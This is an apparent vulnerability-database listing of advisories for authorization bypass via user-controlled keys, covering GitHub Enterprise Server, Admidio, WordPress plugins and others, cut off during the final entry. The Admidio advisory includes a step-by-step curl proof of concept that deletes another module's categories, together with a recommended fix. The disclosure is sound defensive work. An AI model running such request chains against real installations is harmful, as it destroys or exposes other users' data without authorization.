CWE-639
AllowedAuthorization Bypass Through User-Controlled Key
Abstraction: Base · Status: Incomplete
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
3240 vulnerabilities reference this CWE, most recent first.
GHSA-RW5Q-23MH-R4C3
Vulnerability from github – Published: 2025-08-26 03:44 – Updated: 2025-08-26 03:44An improper access control vulnerability was identified in GitHub Enterprise Server that allowed users with access to any repository to retrieve limited code content from another repository by creating a diff between the repositories. To exploit this vulnerability, an attacker needed to know the name of a private repository along with its branches, tags, or commit SHAs that they could use to trigger compare/diff functionality and retrieve limited code without proper authorization. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18, and was fixed in versions 3.14.17, 3.15.12, 3.16.8 and 3.17.5. This vulnerability was reported via the GitHub Bug Bounty program.
{
"affected": [],
"aliases": [
"CVE-2025-8447"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-26T02:15:36Z",
"severity": "HIGH"
},
"details": "An improper access control vulnerability was identified in GitHub Enterprise Server that allowed users with access to any repository to retrieve limited code content from another repository by creating a diff between the repositories. To exploit this vulnerability, an attacker needed to know the name of a private repository along with its branches, tags, or commit SHAs that they could use to trigger compare/diff functionality and retrieve limited code without proper authorization. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.18, and was fixed in versions 3.14.17, 3.15.12, 3.16.8 and 3.17.5. This vulnerability was reported via the GitHub Bug Bounty program.",
"id": "GHSA-rw5q-23mh-r4c3",
"modified": "2025-08-26T03:44:57Z",
"published": "2025-08-26T03:44:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8447"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.17"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.12"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.8"
},
{
"type": "WEB",
"url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RWJR-3J7F-347P
Vulnerability from github – Published: 2025-10-20 15:30 – Updated: 2026-06-05 12:31Authorization Bypass Through User-Controlled Key vulnerability in VHS Electronic Software Ltd. Co. ACE Center allows Privilege Abuse, Exploitation of Trusted Identifiers.This issue affects ACE Center: from 3.10.100.1768 before 3.10.161.2255.
{
"affected": [],
"aliases": [
"CVE-2025-8884"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-20T15:15:34Z",
"severity": "MODERATE"
},
"details": "Authorization Bypass Through User-Controlled Key vulnerability in VHS Electronic Software Ltd. Co. ACE Center allows Privilege Abuse, Exploitation of Trusted Identifiers.This issue affects ACE Center: from 3.10.100.1768 before 3.10.161.2255.",
"id": "GHSA-rwjr-3j7f-347p",
"modified": "2026-06-05T12:31:43Z",
"published": "2025-10-20T15:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8884"
},
{
"type": "WEB",
"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-25-0348"
},
{
"type": "WEB",
"url": "https://www.usom.gov.tr/bildirim/tr-25-0348"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RWJR-QJJ3-MQ2F
Vulnerability from github – Published: 2026-05-29 21:57 – Updated: 2026-05-29 21:57Summary
modules/categories.php checks that the supplied type parameter (ANN, EVT, ROL, USF, …) corresponds to a module the actor administers. The follow-up "is this specific category editable by me" check at lines 56-61 is dead code because it compares $getType (a category-type code) against mode names (edit/save/delete); the condition is permanently false, so $category->isEditable() is never invoked. The delete, sequence, and save switch cases load the category by the supplied UUID and act on it without re-checking that the category belongs to a module the actor administers. A user holding only one module-administrator right can therefore destroy or reorder empty categories belonging to other modules — for example, an announcements administrator can delete role categories, profile-field categories, or weblink categories that they have no right to touch.
Details
vulnerable code
modules/categories.php:40-61:
$getMode = admFuncVariableIsValid($_GET, 'mode', 'string',
array('defaultValue' => 'list',
'validValues' => array('list', 'edit', 'save', 'delete', 'sequence')));
$getType = admFuncVariableIsValid($_GET, 'type', 'string',
array('validValues' => array('ANN','AWA','EVT','FOT','LNK','ROL','USF','IVT')));
$getCategoryUUID = admFuncVariableIsValid($_GET, 'uuid', 'uuid');
// check rights of the type
if (($getType === 'ANN' && !$gCurrentUser->isAdministratorAnnouncements())
|| ($getType === 'AWA' && !$gCurrentUser->isAdministratorUsers())
|| ($getType === 'EVT' && !$gCurrentUser->isAdministratorEvents())
|| ($getType === 'FOT' && !$gCurrentUser->isAdministratorForum())
|| ($getType === 'LNK' && !$gCurrentUser->isAdministratorWeblinks())
|| ($getType === 'ROL' && !$gCurrentUser->isAdministratorRoles())
|| ($getType === 'USF' && !$gCurrentUser->isAdministratorUsers())
|| ($getType === 'IVT' && !$gCurrentUser->isAdministratorInventory())) {
throw new Exception('SYS_NO_RIGHTS');
}
if (in_array($getType, array('edit', 'save', 'delete'))) { // <- DEAD CODE
// check if this category is editable by the current user and current organization
if (!$category->isEditable()) {
throw new Exception('SYS_NO_RIGHTS');
}
}
The in_array($getType, array('edit','save','delete')) test compares the category-type code to mode names. $getType can only be ANN, AWA, EVT, FOT, LNK, ROL, USF, or IVT (it is rejected by admFuncVariableIsValid if it is anything else), so the array intersection is permanently empty. The intended check was probably in_array($getMode, array('edit','save','delete')). As written, $category->isEditable() is never called from this entry point, and the $category symbol is not defined here at all (it is local to other code paths), so even if the operator were corrected the body of the if would throw an undefined-variable warning before doing anything useful.
modules/categories.php:99-110 — the delete switch case just loads the category by UUID and deletes it, with no per-record permission check:
case 'delete':
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$menu = new Category($gDb);
$menu->readDataByUuid($getCategoryUUID);
$menu->delete();
echo json_encode(array('status' => 'success'));
break;
modules/categories.php:112-123 — the sequence switch case has the same shape.
Category::delete() blocks deletion of the system / default category and of categories that still have referenced records (events, announcements, role assignments, etc.), but does not check whether the category's cat_type matches a module the actor has rights over.
exploitation flow
- Attacker has
Announcements administrator(or any other single module-admin right) but is not a roles / inventory / weblinks administrator. - Attacker observes the UUID of a target category by listing categories of any type they DO have rights over (the listing returns category UUIDs of their own type), or simply enumerates by visiting
modules/categories.php?type=<their_type>&mode=list. - Attacker requests
POST /modules/categories.php?mode=delete&type=ANN&uuid=<UUID-of-foreign-category>carrying their validadm_csrf_token.type=ANNsatisfies the rights gate at line 47-58 (they are an announcements admin). The deadifat line 56 does not fire. The switch falls intocase 'delete':which deletes the category without re-checking the type. - Server replies
{"status":"success"}. The cross-module category is gone.
The same primitive applies to mode=sequence (reorder), and to mode=save for editing the category's name and description.
PoC
Tested on a fresh install of HEAD c5cde53 running on PHP 8.4 + MariaDB 11.8 at http://127.0.0.1:8085. Reproduces in two requests. testadmin is the bootstrap administrator created during install; annadmin is a freshly-created user whose only role is Association's board with rol_announcements=1 (no roles / inventory / weblinks rights).
# 0. set-up: confirm starting state of the cross-module category
$ mariadb -h 127.0.0.1 -P 3399 -u admidio -p... admidio \
-e "SELECT cat_id, cat_uuid, cat_type, cat_name FROM adm_categories WHERE cat_type='ROL' AND cat_name='TEAMS';"
cat_id cat_uuid cat_type cat_name
7 846536b9-2582-4845-a5ff-dee06f3212c7 ROL TEAMS
# 1. login as annadmin (announcements admin only) and capture session + csrf
$ curl -s -c $C -b $C "http://127.0.0.1:8085/index.php?module=auth" > /dev/null
$ html=$(curl -s -c $C -b $C "http://127.0.0.1:8085/system/login.php?...")
$ csrf=$(grep -oE 'adm_csrf_token[^"]+value="[^"]+' /tmp/login.html | head -1 | ...)
$ curl -s -c $C -b $C \
--data-urlencode "adm_csrf_token=$csrf" \
--data-urlencode "adm_login_name=annadmin" \
--data-urlencode "adm_password=Annpwd123!" \
"http://127.0.0.1:8085/system/login.php?mode=check"
{"status":"success","url":"..."}
# 2. as annadmin, GET the categories page once to seed an in-session form key
$ html=$(curl -s -b $C "http://127.0.0.1:8085/modules/categories.php?type=ANN&mode=list")
$ csrf=$(echo "$html" | grep -oE 'adm_csrf_token[^"]+value="[^"]+' | head -1 | sed 's/.*value="//')
# 3. fire the cross-type delete: type=ANN (annadmin has rights), uuid=<ROL category>
$ curl -s -b $C \
-X POST \
--data-urlencode "adm_csrf_token=$csrf" \
--data-urlencode "direction=" \
"http://127.0.0.1:8085/modules/categories.php?mode=delete&type=ANN&uuid=846536b9-2582-4845-a5ff-dee06f3212c7"
{"status":"success"}
# 4. verify the row is gone — annadmin had no role-administrator rights
$ mariadb ... admidio -e "SELECT * FROM adm_categories WHERE cat_uuid='846536b9-2582-4845-a5ff-dee06f3212c7';"
(no rows)
The same chain with mode=sequence&direction=UP reorders a foreign category. With mode=save, an attacker can rename the foreign category and (via the unprotected cat_type rebind in CategoryService::save() line 210) re-tag it to a different module type, breaking referential consistency.
Impact
Any user with at least one module-administrator right can delete or reorder admin-managed categories of other modules:
- Role categories (the structural grouping of all roles in the organisation)
- Event calendars (each calendar is a category of type
EVT) - Profile-field categories (the grouping of which fields are shown on which profile tab)
- Weblink categories
- Forum categories (
FOT) - Inventory categories (
IVT)
Category::delete() blocks categories with active rows, so the attack lands on currently-empty categories, but a malicious announcement-admin can also delete the default category for a module immediately after the legitimate admin deletes its last record, eliminating the implicit "Default Category" before a new record can re-create it. The target organisation loses the structural grouping for an entire module and must rebuild it by hand from a fresh database state.
The CVSS reflects: any user with a single module-admin role can permanently destroy structural metadata for every other module. PR:L because module-admin rights are routinely granted to non-administrative users (chairs of subgroups, content editors). I:H because data is destroyed and there is no in-product undo. A:N because the system stays up; only the affected module's metadata is gone.
Recommended Fix
Replace the dead if (in_array($getType, array('edit', 'save', 'delete'))) block with a real check on $getMode plus a per-record isEditable() test that re-derives the module from cat_type:
if (in_array($getMode, array('edit', 'save', 'delete', 'sequence'), true) && $getCategoryUUID !== '') {
$category = new Category($gDb);
$category->readDataByUuid($getCategoryUUID);
if ($category->isNewRecord()) {
throw new Exception('SYS_INVALID_PAGE_VIEW');
}
// re-check rights against the *record's* cat_type, not the user-supplied type
$recordType = $category->getValue('cat_type');
if ( ($recordType === 'ANN' && !$gCurrentUser->isAdministratorAnnouncements())
|| ($recordType === 'AWA' && !$gCurrentUser->isAdministratorUsers())
|| ($recordType === 'EVT' && !$gCurrentUser->isAdministratorEvents())
|| ($recordType === 'FOT' && !$gCurrentUser->isAdministratorForum())
|| ($recordType === 'LNK' && !$gCurrentUser->isAdministratorWeblinks())
|| ($recordType === 'ROL' && !$gCurrentUser->isAdministratorRoles())
|| ($recordType === 'USF' && !$gCurrentUser->isAdministratorUsers())
|| ($recordType === 'IVT' && !$gCurrentUser->isAdministratorInventory())) {
throw new Exception('SYS_NO_RIGHTS');
}
if (!$category->isEditable()) {
throw new Exception('SYS_NO_RIGHTS');
}
}
Additionally, CategoryService::save() should refuse to mutate cat_type when editing an existing record (drop the $this->categoryRessource->setValue('cat_type', $this->type) at line 210, or set it only when isNewRecord()).
A regression test should call categories.php?mode=delete&type=ANN&uuid=<ROL-category> as a user with only isAdministratorAnnouncements() and assert the response is SYS_NO_RIGHTS rather than success.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.0.9"
},
"package": {
"ecosystem": "Packagist",
"name": "admidio/admidio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.0.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47227"
],
"database_specific": {
"cwe_ids": [
"CWE-639",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T21:57:05Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\n`modules/categories.php` checks that the supplied `type` parameter (`ANN`, `EVT`, `ROL`, `USF`, \u2026) corresponds to a module the actor administers. The follow-up \"is this specific category editable by me\" check at lines 56-61 is dead code because it compares `$getType` (a category-type code) against mode names (`edit`/`save`/`delete`); the condition is permanently false, so `$category-\u003eisEditable()` is never invoked. The `delete`, `sequence`, and `save` switch cases load the category by the supplied UUID and act on it without re-checking that the category belongs to a module the actor administers. A user holding only one module-administrator right can therefore destroy or reorder empty categories belonging to *other* modules \u2014 for example, an announcements administrator can delete role categories, profile-field categories, or weblink categories that they have no right to touch.\n\n## Details\n\n### vulnerable code\n\n`modules/categories.php:40-61`:\n\n```php\n$getMode = admFuncVariableIsValid($_GET, \u0027mode\u0027, \u0027string\u0027,\n array(\u0027defaultValue\u0027 =\u003e \u0027list\u0027,\n \u0027validValues\u0027 =\u003e array(\u0027list\u0027, \u0027edit\u0027, \u0027save\u0027, \u0027delete\u0027, \u0027sequence\u0027)));\n$getType = admFuncVariableIsValid($_GET, \u0027type\u0027, \u0027string\u0027,\n array(\u0027validValues\u0027 =\u003e array(\u0027ANN\u0027,\u0027AWA\u0027,\u0027EVT\u0027,\u0027FOT\u0027,\u0027LNK\u0027,\u0027ROL\u0027,\u0027USF\u0027,\u0027IVT\u0027)));\n$getCategoryUUID = admFuncVariableIsValid($_GET, \u0027uuid\u0027, \u0027uuid\u0027);\n\n// check rights of the type\nif (($getType === \u0027ANN\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorAnnouncements())\n || ($getType === \u0027AWA\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorUsers())\n || ($getType === \u0027EVT\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorEvents())\n || ($getType === \u0027FOT\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorForum())\n || ($getType === \u0027LNK\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorWeblinks())\n || ($getType === \u0027ROL\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorRoles())\n || ($getType === \u0027USF\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorUsers())\n || ($getType === \u0027IVT\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorInventory())) {\n throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n}\n\nif (in_array($getType, array(\u0027edit\u0027, \u0027save\u0027, \u0027delete\u0027))) { // \u003c- DEAD CODE\n // check if this category is editable by the current user and current organization\n if (!$category-\u003eisEditable()) {\n throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n }\n}\n```\n\nThe `in_array($getType, array(\u0027edit\u0027,\u0027save\u0027,\u0027delete\u0027))` test compares the category-type code to mode names. `$getType` can only be `ANN`, `AWA`, `EVT`, `FOT`, `LNK`, `ROL`, `USF`, or `IVT` (it is rejected by `admFuncVariableIsValid` if it is anything else), so the array intersection is permanently empty. The intended check was probably `in_array($getMode, array(\u0027edit\u0027,\u0027save\u0027,\u0027delete\u0027))`. As written, `$category-\u003eisEditable()` is never called from this entry point, and the `$category` symbol is not defined here at all (it is local to other code paths), so even if the operator were corrected the body of the if would throw an undefined-variable warning before doing anything useful.\n\n`modules/categories.php:99-110` \u2014 the `delete` switch case just loads the category by UUID and deletes it, with no per-record permission check:\n\n```php\ncase \u0027delete\u0027:\n SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n\n $menu = new Category($gDb);\n $menu-\u003ereadDataByUuid($getCategoryUUID);\n $menu-\u003edelete();\n echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n break;\n```\n\n`modules/categories.php:112-123` \u2014 the `sequence` switch case has the same shape.\n\n`Category::delete()` blocks deletion of the system / default category and of categories that still have referenced records (events, announcements, role assignments, etc.), but does *not* check whether the category\u0027s `cat_type` matches a module the actor has rights over.\n\n### exploitation flow\n\n1. Attacker has `Announcements administrator` (or any other single module-admin right) but is **not** a roles / inventory / weblinks administrator.\n2. Attacker observes the UUID of a target category by listing categories of any type they DO have rights over (the listing returns category UUIDs of their own type), or simply enumerates by visiting `modules/categories.php?type=\u003ctheir_type\u003e\u0026mode=list`.\n3. Attacker requests `POST /modules/categories.php?mode=delete\u0026type=ANN\u0026uuid=\u003cUUID-of-foreign-category\u003e` carrying their valid `adm_csrf_token`. `type=ANN` satisfies the rights gate at line 47-58 (they are an announcements admin). The dead `if` at line 56 does not fire. The switch falls into `case \u0027delete\u0027:` which deletes the category without re-checking the type.\n4. Server replies `{\"status\":\"success\"}`. The cross-module category is gone.\n\nThe same primitive applies to `mode=sequence` (reorder), and to `mode=save` for editing the category\u0027s name and description.\n\n## PoC\n\nTested on a fresh install of HEAD `c5cde53` running on PHP 8.4 + MariaDB 11.8 at `http://127.0.0.1:8085`. Reproduces in two requests. `testadmin` is the bootstrap administrator created during install; `annadmin` is a freshly-created user whose only role is `Association\u0027s board` with `rol_announcements=1` (no roles / inventory / weblinks rights).\n\n```\n# 0. set-up: confirm starting state of the cross-module category\n$ mariadb -h 127.0.0.1 -P 3399 -u admidio -p... admidio \\\n -e \"SELECT cat_id, cat_uuid, cat_type, cat_name FROM adm_categories WHERE cat_type=\u0027ROL\u0027 AND cat_name=\u0027TEAMS\u0027;\"\ncat_id cat_uuid cat_type cat_name\n7 846536b9-2582-4845-a5ff-dee06f3212c7 ROL TEAMS\n\n# 1. login as annadmin (announcements admin only) and capture session + csrf\n$ curl -s -c $C -b $C \"http://127.0.0.1:8085/index.php?module=auth\" \u003e /dev/null\n$ html=$(curl -s -c $C -b $C \"http://127.0.0.1:8085/system/login.php?...\")\n$ csrf=$(grep -oE \u0027adm_csrf_token[^\"]+value=\"[^\"]+\u0027 /tmp/login.html | head -1 | ...)\n$ curl -s -c $C -b $C \\\n --data-urlencode \"adm_csrf_token=$csrf\" \\\n --data-urlencode \"adm_login_name=annadmin\" \\\n --data-urlencode \"adm_password=Annpwd123!\" \\\n \"http://127.0.0.1:8085/system/login.php?mode=check\"\n{\"status\":\"success\",\"url\":\"...\"}\n\n# 2. as annadmin, GET the categories page once to seed an in-session form key\n$ html=$(curl -s -b $C \"http://127.0.0.1:8085/modules/categories.php?type=ANN\u0026mode=list\")\n$ csrf=$(echo \"$html\" | grep -oE \u0027adm_csrf_token[^\"]+value=\"[^\"]+\u0027 | head -1 | sed \u0027s/.*value=\"//\u0027)\n\n# 3. fire the cross-type delete: type=ANN (annadmin has rights), uuid=\u003cROL category\u003e\n$ curl -s -b $C \\\n -X POST \\\n --data-urlencode \"adm_csrf_token=$csrf\" \\\n --data-urlencode \"direction=\" \\\n \"http://127.0.0.1:8085/modules/categories.php?mode=delete\u0026type=ANN\u0026uuid=846536b9-2582-4845-a5ff-dee06f3212c7\"\n{\"status\":\"success\"}\n\n# 4. verify the row is gone \u2014 annadmin had no role-administrator rights\n$ mariadb ... admidio -e \"SELECT * FROM adm_categories WHERE cat_uuid=\u0027846536b9-2582-4845-a5ff-dee06f3212c7\u0027;\"\n(no rows)\n```\n\nThe same chain with `mode=sequence\u0026direction=UP` reorders a foreign category. With `mode=save`, an attacker can rename the foreign category and (via the unprotected `cat_type` rebind in `CategoryService::save()` line 210) re-tag it to a different module type, breaking referential consistency.\n\n## Impact\n\nAny user with at least one module-administrator right can delete or reorder admin-managed categories of other modules:\n\n- Role categories (the structural grouping of all roles in the organisation)\n- Event calendars (each calendar is a category of type `EVT`)\n- Profile-field categories (the grouping of which fields are shown on which profile tab)\n- Weblink categories\n- Forum categories (`FOT`)\n- Inventory categories (`IVT`)\n\n`Category::delete()` blocks categories with active rows, so the attack lands on currently-empty categories, but a malicious announcement-admin can also delete the *default* category for a module immediately after the legitimate admin deletes its last record, eliminating the implicit \"Default Category\" before a new record can re-create it. The target organisation loses the structural grouping for an entire module and must rebuild it by hand from a fresh database state.\n\nThe CVSS reflects: any user with a single module-admin role can permanently destroy structural metadata for every other module. `PR:L` because module-admin rights are routinely granted to non-administrative users (chairs of subgroups, content editors). `I:H` because data is destroyed and there is no in-product undo. `A:N` because the system stays up; only the affected module\u0027s metadata is gone.\n\n## Recommended Fix\n\nReplace the dead `if (in_array($getType, array(\u0027edit\u0027, \u0027save\u0027, \u0027delete\u0027)))` block with a real check on `$getMode` plus a per-record `isEditable()` test that re-derives the module from `cat_type`:\n\n```php\nif (in_array($getMode, array(\u0027edit\u0027, \u0027save\u0027, \u0027delete\u0027, \u0027sequence\u0027), true) \u0026\u0026 $getCategoryUUID !== \u0027\u0027) {\n $category = new Category($gDb);\n $category-\u003ereadDataByUuid($getCategoryUUID);\n\n if ($category-\u003eisNewRecord()) {\n throw new Exception(\u0027SYS_INVALID_PAGE_VIEW\u0027);\n }\n\n // re-check rights against the *record\u0027s* cat_type, not the user-supplied type\n $recordType = $category-\u003egetValue(\u0027cat_type\u0027);\n if ( ($recordType === \u0027ANN\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorAnnouncements())\n || ($recordType === \u0027AWA\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorUsers())\n || ($recordType === \u0027EVT\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorEvents())\n || ($recordType === \u0027FOT\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorForum())\n || ($recordType === \u0027LNK\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorWeblinks())\n || ($recordType === \u0027ROL\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorRoles())\n || ($recordType === \u0027USF\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorUsers())\n || ($recordType === \u0027IVT\u0027 \u0026\u0026 !$gCurrentUser-\u003eisAdministratorInventory())) {\n throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n }\n\n if (!$category-\u003eisEditable()) {\n throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n }\n}\n```\n\nAdditionally, `CategoryService::save()` should refuse to mutate `cat_type` when editing an existing record (drop the `$this-\u003ecategoryRessource-\u003esetValue(\u0027cat_type\u0027, $this-\u003etype)` at line 210, or set it only when `isNewRecord()`).\n\nA regression test should call `categories.php?mode=delete\u0026type=ANN\u0026uuid=\u003cROL-category\u003e` as a user with only `isAdministratorAnnouncements()` and assert the response is `SYS_NO_RIGHTS` rather than `success`.",
"id": "GHSA-rwjr-qjj3-mq2f",
"modified": "2026-05-29T21:57:05Z",
"published": "2026-05-29T21:57:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-rwjr-qjj3-mq2f"
},
{
"type": "PACKAGE",
"url": "https://github.com/Admidio/admidio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Admidio module-administrator can delete or reorder categories owned by other modules via dead authorization check in `modules/categories.php`"
}
GHSA-RWM7-XHJ3-2XJV
Vulnerability from github – Published: 2026-06-06 06:30 – Updated: 2026-06-06 06:30The Klamra Paycal for Aspaclaria plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.4 via the 'invoice_id' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to download arbitrary customer invoices by enumerating sequential post IDs, exposing sensitive billing PII including full name, email address, phone number, order total, line items, and customer notes belonging to other customers.
{
"affected": [],
"aliases": [
"CVE-2026-8611"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-06T05:16:29Z",
"severity": "MODERATE"
},
"details": "The Klamra Paycal for Aspaclaria plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.1.4 via the \u0027invoice_id\u0027 parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to download arbitrary customer invoices by enumerating sequential post IDs, exposing sensitive billing PII including full name, email address, phone number, order total, line items, and customer notes belonging to other customers.",
"id": "GHSA-rwm7-xhj3-2xjv",
"modified": "2026-06-06T06:30:29Z",
"published": "2026-06-06T06:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8611"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/klamra-paycal-for-aspaclaria/tags/1.0.2/includes/Modules/Invoices/Legacy/includes/pdf/download.php#L4"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/klamra-paycal-for-aspaclaria/tags/1.0.2/includes/Modules/Invoices/Legacy/includes/pdf/download.php#L7"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/klamra-paycal-for-aspaclaria/tags/1.0.2/includes/Modules/Invoices/Legacy/includes/render.php#L72"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/klamra-paycal-for-aspaclaria/tags/1.1.1/includes/Modules/Invoices/Legacy/includes/pdf/download.php#L4"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/klamra-paycal-for-aspaclaria/tags/1.1.1/includes/Modules/Invoices/Legacy/includes/pdf/download.php#L7"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/klamra-paycal-for-aspaclaria/tags/1.1.1/includes/Modules/Invoices/Legacy/includes/render.php#L72"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3555026%40klamra-paycal-for-aspaclaria\u0026new=3555026%40klamra-paycal-for-aspaclaria\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b07dc6ff-f88d-4c5a-8cd5-7c20f1755ece?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RX2M-XR4X-54HH
Vulnerability from github – Published: 2022-12-28 15:30 – Updated: 2023-01-10 15:46usememos/memos 0.9.0 and prior is vulnerable to Improper Authorization.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/usememos/memos"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-4802"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-30T19:58:02Z",
"nvd_published_at": "2022-12-28T14:15:00Z",
"severity": "MODERATE"
},
"details": "usememos/memos 0.9.0 and prior is vulnerable to Improper Authorization.",
"id": "GHSA-rx2m-xr4x-54hh",
"modified": "2023-01-10T15:46:25Z",
"published": "2022-12-28T15:30:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4802"
},
{
"type": "WEB",
"url": "https://github.com/usememos/memos/commit/3556ae4e651d9443dc3bb8a170dd3cc726517a53"
},
{
"type": "PACKAGE",
"url": "https://github.com/usememos/memos"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/d47d4a94-92e3-4400-b012-a8577cbd7956"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "usememos/memos vulnerable to Improper Authorization"
}
GHSA-RX38-XPJ5-528C
Vulnerability from github – Published: 2022-07-21 00:00 – Updated: 2022-07-28 00:00The main MiCODUS MV720 GPS tracker web server has an authenticated insecure direct object references vulnerability on endpoint and POST parameter “Device ID,” which accepts arbitrary device IDs.
{
"affected": [],
"aliases": [
"CVE-2022-33944"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-20T16:15:00Z",
"severity": "MODERATE"
},
"details": "The main MiCODUS MV720 GPS tracker web server has an authenticated insecure direct object references vulnerability on endpoint and POST parameter \u201cDevice ID,\u201d which accepts arbitrary device IDs.",
"id": "GHSA-rx38-xpj5-528c",
"modified": "2022-07-28T00:00:40Z",
"published": "2022-07-21T00:00:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33944"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-200-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RXC7-FX8M-JFJP
Vulnerability from github – Published: 2025-11-08 06:30 – Updated: 2025-11-08 06:30The WPFunnels – The Easiest Funnel Builder For WordPress And WooCommerce To Collect Leads And Increase Sales plugin for WordPress is vulnerable to unauthorized user registration in all versions up to, and including, 3.6.2. This is due to the plugin relying on a user controlled value 'optin_allow_registration' to determine if user registration is allowed, instead of the site-specific setting. This makes it possible for unauthenticated attackers to register new user accounts, even when user registration is disabled.
{
"affected": [],
"aliases": [
"CVE-2025-12353"
],
